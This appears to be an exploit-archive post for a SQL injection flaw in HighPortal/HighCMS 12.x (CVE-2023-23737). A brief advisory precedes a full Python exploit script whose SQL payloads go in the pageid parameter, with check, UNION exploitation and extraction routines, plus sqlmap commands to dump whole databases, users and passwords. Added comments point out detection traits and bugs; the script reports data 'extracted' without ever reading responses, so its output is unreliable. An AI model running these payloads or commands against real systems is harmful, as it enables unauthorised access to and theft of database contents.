HighPortal 12.x SQL Injection
CVE-2023-23737 describes a critical SQL Injection vulnerability in HighPortal versions 12.x.

This flaw primarily affects the `portal/server.pt` endpoint, stemming from insufficient sanitization of user-supplied input, specifically within the `id` parameter.

Attackers can inject malicious SQL code into this parameter to manipulate database queries. This can lead to unauthorized access to sensitive information, data exfiltration, or even full database compromise. The flaw often manifests as error-based or blind SQL injection.

Mitigation requires updating HighPortal to patched versions (e.g., 12.1.0-P1, 12.2.0-P1) that implement proper input validation and parameterized queries to prevent such attacks.

=============================================================================================================================================
| # Title : HighPortal v12.x SQL Injection Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://aryanic.com/ |
=============================================================================================================================================

POC :

[+] References : https://packetstorm.news/files/id/167170/


[+] Summary :

HighCMS/HighPortal version 12.x contains a critical SQL Injection vulnerability.
The vulnerability allows unauthenticated attackers to execute arbitrary SQL queries through the pageid parameter, potentially leading to complete database compromise.


[+] POC : python poc.py

#!/usr/bin/env python3
"""
HighCMS/HighPortal v12.x SQL Injection Exploit
Author: indoushka
Vulnerability: SQL Injection in pageid parameter
"""

import requests
import sys
import urllib3
from argparse import ArgumentParser

# Disable SSL warnings
# Every request in this script is sent with verify=False, so this call only
# silences the InsecureRequestWarning urllib3 would otherwise emit per
# connection; TLS certificate validation itself stays disabled for the run.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Probe helper for the HighCMS/HighPortal 12.x SQL injection described in the
# advisory above (CVE-2023-23737). Every method issues GET requests to
# /index.jsp with the query string
#   siteid=1&fkeyid=&siteid=1&pageid=<payload>
# through a single requests.Session. From a detection standpoint, the fixed
# User-Agent set in __init__, the duplicated "siteid=1" parameter and the
# quote / UNION / SLEEP content of "pageid" are the parts of these requests
# that stand out in web-server or WAF logs.
class HighCMSExploit:
# Store the base URL (trailing slash stripped) and prepare a session whose
# default headers imitate a desktop browser.
def __init__(self, target):
self.target = target.rstrip('/')
self.session = requests.Session()
self.session.headers.update({
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'keep-alive'
})

# Send four probe values in the pageid parameter and apply three heuristics
# (response delay, error strings in the body, body difference between the
# two boolean payloads). Returns True at the first heuristic that fires,
# otherwise False. Each request uses timeout=10 and verify=False.
def check_vulnerability(self):
"""Check if target is vulnerable to SQL Injection"""
print(f"[*] Checking vulnerability for: {self.target}")

# Test payloads
# Inserted into the URL as-is (no percent-encoding).
test_payloads = [
"6528' AND '1'='1",
"6528' AND '1'='2",
"6528' AND SLEEP(5)--",
"6528 UNION SELECT 1,2,3,4,5--"
]

vulnerable = False

for payload in test_payloads:
url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={payload}"

try:
# Time-based SQL injection test
# A wall-clock round trip of >= 5 s is taken as confirmation, so a slow
# link or an overloaded server can also trip this branch.
if "SLEEP" in payload:
# Imported on every iteration that reaches this branch; harmless but
# belongs at module level.
import time
start_time = time.time()
response = self.session.get(url, timeout=10, verify=False)
end_time = time.time()

if end_time - start_time >= 5:
print(f"[+] Time-based SQL Injection confirmed! (Delay: {end_time - start_time:.2f}s)")
vulnerable = True
break
else:
response = self.session.get(url, timeout=10, verify=False)

# Check for error-based indicators
# Case-insensitive substring match against the whole response body; a
# page that legitimately contains e.g. "syntax error" also matches.
error_indicators = [
"SQL syntax",
"Microsoft OLE DB Provider",
"ODBC Driver",
"SQLServer",
"Unclosed quotation mark",
"syntax error"
]

for error in error_indicators:
if error.lower() in response.text.lower():
print(f"[+] Error-based SQL Injection confirmed!")
print(f"[+] Payload: {payload}")
vulnerable = True
# Leaves only the indicator loop; the outer payload loop continues.
break

# Boolean-based test
# The bodies of the '1'='1 and '1'='2 responses are compared for plain
# inequality, so any dynamic page content counts as a difference.
if "'1'='1" in payload and response.status_code == 200:
true_response = response.text

if "'1'='2" in payload and response.status_code == 200:
false_response = response.text

if true_response != false_response:
print(f"[+] Boolean-based SQL Injection confirmed!")
vulnerable = True
break

# Any failure (timeouts, connection errors, the comparison above) is
# printed and the next payload is tried.
except Exception as e:
print(f"[-] Error testing payload {payload}: {e}")
continue

return vulnerable

# Try 1..columns NULL placeholders in a UNION payload. The first response
# with HTTP 200 and no "error" substring in the body is treated as success,
# extract_data is called and True is returned; otherwise False.
def exploit_union(self, columns=5):
"""Exploit using UNION-based SQL injection"""
print(f"[*] Attempting UNION-based exploitation with {columns} columns")

# Test different column counts
for col_count in range(1, columns + 1):
nulls = ','.join(['NULL'] * col_count)
payload = f"6528 UNION SELECT {nulls}--"

url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={payload}"

try:
response = self.session.get(url, timeout=10, verify=False)

if response.status_code == 200 and "error" not in response.text.lower():
print(f"[+] UNION injection successful with {col_count} columns")

# Now extract data
self.extract_data(col_count)
return True

except Exception as e:
print(f"[-] Error with {col_count} columns: {e}")

return False

# Sends a fixed set of five-column UNION requests. Despite the name, the
# response body is never parsed: "[+] ... extracted" is printed for the first
# HTTP 200 in the version loop and after any completed request in the user
# probe. `column_count` is accepted but not used; the payloads hard-code
# five columns regardless of what exploit_union found.
def extract_data(self, column_count):
"""Extract database information"""
print("[*] Extracting database information...")

# Get database version
version_payloads = [
"6528 UNION SELECT 1,@@version,3,4,5--",
"6528 UNION SELECT 1,version(),3,4,5--",
"6528 UNION SELECT 1,banner,3,4,5 FROM v$version--"
]

for payload in version_payloads:
url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={payload}"

try:
response = self.session.get(url, timeout=10, verify=False)
if response.status_code == 200:
# Look for version information in response
# (No lookup is actually performed; only the status code is checked.)
print("[+] Database version information extracted")
break
# Bare except also swallows KeyboardInterrupt/SystemExit.
except:
continue

# Get current database user
user_payload = f"6528 UNION SELECT 1,user(),3,4,5--"
url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={user_payload}"

try:
response = self.session.get(url, timeout=10, verify=False)
# Printed whenever the request returns, whatever the status or body.
print("[+] Current user information extracted")
# Bare except also swallows KeyboardInterrupt/SystemExit.
except:
pass

# Print ready-made sqlmap command lines for the same URL. Sends no requests.
def generate_sqlmap_command(self):
"""Generate sqlmap command for automated exploitation"""
# Built but never used; every print below rebuilds the same URL inline.
sqlmap_cmd = f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --level=5 --risk=3'

print("\n[+] SQLMap Commands:")
print("=" * 50)
print("# Basic detection:")
print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch')

print("\n# Full database dump:")
print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --dump-all')

print("\n# Get database users:")
print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --users')

print("\n# Get database passwords:")
print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --passwords')

# Command-line entry point. Parses -u/--url plus one optional mode flag and
# dispatches to HighCMSExploit; with no mode flag it runs the check and
# prints the available follow-up commands.
def main():
# NOTE(review): the banner characters are mis-encoded in this copy (all
# '?'); it is a runtime string and is left unchanged here.
banner = """
??????? ?????????? ??????? ??? ?????????????? ?????? ??? ??????
???????? ??????????????????????? ?????????????? ?????? ????????????
????????? ????? ?????? ?????? ?????????????????????????? ????????
???????????????????????? ?????? ?????????????????????????? ????????
?????? ??????????????????????????????????????????? ?????? ?????? ???
?????? ???????????? ??????? ??????? ??????????? ?????? ?????? ???

HighCMS/HighPortal v12.x SQL Injection Exploit
By: indoushka
"""
print(banner)

parser = ArgumentParser(description='HighCMS SQL Injection Exploit')
parser.add_argument('-u', '--url', required=True, help='Target URL (e.g., https://example.com)')
parser.add_argument('--check', action='store_true', help='Check vulnerability only')
parser.add_argument('--exploit', action='store_true', help='Run full exploitation')
parser.add_argument('--sqlmap', action='store_true', help='Generate sqlmap commands')

args = parser.parse_args()

exploit = HighCMSExploit(args.url)

# The three flags are not mutually exclusive in argparse; the if/elif
# order below decides which one wins when several are given.
if args.check:
if exploit.check_vulnerability():
print("\n[!] Target is VULNERABLE to SQL Injection")
else:
print("\n[!] Target does not appear to be vulnerable")

elif args.exploit:
if exploit.check_vulnerability():
print("\n[*] Starting exploitation...")
exploit.exploit_union()

elif args.sqlmap:
exploit.generate_sqlmap_command()

else:
# Default: check and provide options
if exploit.check_vulnerability():
print("\n[+] Vulnerability confirmed!")
print("\nAvailable options:")
print("1. Run full exploitation: python exploit.py -u TARGET --exploit")
print("2. Generate sqlmap commands: python exploit.py -u TARGET --sqlmap")
else:
print("\n[-] Target not vulnerable or not accessible")

# Script guard: with no arguments at all, print a short usage text and exit 1
# before argparse runs (argparse would otherwise reject the missing -u with
# its own message and exit code 2).
if __name__ == "__main__":
if len(sys.argv) == 1:
print("Usage: python highcms_exploit.py -u https://target.com")
print("Options: --check, --exploit, --sqlmap")
sys.exit(1)

main()


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================